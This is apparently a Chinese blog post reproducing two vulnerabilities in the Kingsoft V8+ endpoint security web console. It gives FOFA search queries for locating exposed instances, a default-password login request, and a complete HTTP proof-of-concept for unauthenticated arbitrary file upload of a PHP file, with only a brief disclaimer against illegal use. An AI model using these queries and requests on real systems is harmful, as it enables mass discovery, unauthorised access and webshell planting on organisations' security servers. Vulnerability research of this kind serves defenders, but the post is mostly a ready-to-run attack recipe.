最近一个金山的漏洞闹得沸沸扬扬 有人要我分享下,我特意测试了下确实存在两个漏洞,第一个大家都知道的默认密码漏洞。第二个是未授权的上传漏洞。
二、漏洞复现
祭出fofa大法,fofa语法如下
app="猎鹰安全-金山V8+终端安全系统" #V8 和v9都有
title="在线安装-V8+终端安全系统Web控制台" #只搜V8,v9不存在弱口令 因为安装后第一次
进入系统需要更改密码
具体看自己怎么操作了
先来一波测试弱口令吧
默认密码进去抓包
得到具体参数,根据反复观察我们了解到post一段json格式的代码到特定的路径,若返回包状态码为200并且有关键字段userSession即表示存在弱口令
POST /inter/ajax.php?cmd=
get_user_login_cm{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}
那么我们可以自己写一个批量的探测POC 当然也可以用burp直接批量跑也可以 看自己喜欢了
部分代码如下
结果
这里就不在叙述了,最关键的来了 上传这块。很多人没有复现成功。我把我所成功的步骤分享下,其实也没什么。其实只是照着网络上流传的那样进行操作而已,(如果自己搭建可能不能成功)
漏洞位置/tools/manage/upload.php
在tools目录下的mange下存在一个upload.php。
该文件可导致任意文件上传
上传存放位置为根目录下的uploaddir中
最终上传路径为文件的存储路径为$uploaddir+上传文件名
那么我们构建一个请求
poc如下
POST /tools/manage/upload.php HTTP/1.1
Host: ?
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ee6g13ou1lrgi6rj8cjpljr8f5; SCNum=1; GUID=49309453-E3DD-417A-9181-1028E68BE797; SCIP=192.168.20.31; topSC=1; kidtype=6766; hid=E2821D1E; sn=107000-011007-292753-261525
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCmFouLjmLS7D4iZr
------WebKitFormBoundaryCmFouLjmLS7D4iZr
Content-Disposition: form-data; name="file"; filename="4bbc9855ce373d60847521589b287ced.php"
Content-Type: image/jpeg
<%out.print(1237);%>
------WebKitFormBoundaryCmFouLjmLS7D4iZr--
年轻人要讲武德切勿做非法事情。我们学习的是思路 值得注意的是,感觉能打开几秒然后就没了,具体是什么原因暂时不知道 ,你在访问的时候可能就不行了。
为了证明确实存在多进行一个步骤。不过依旧是如此。到底啥原因真不好说,是缓存导致的?还是什么,有知道的师傅可以留言 我会通过的,也好为大家解惑一下 感谢了
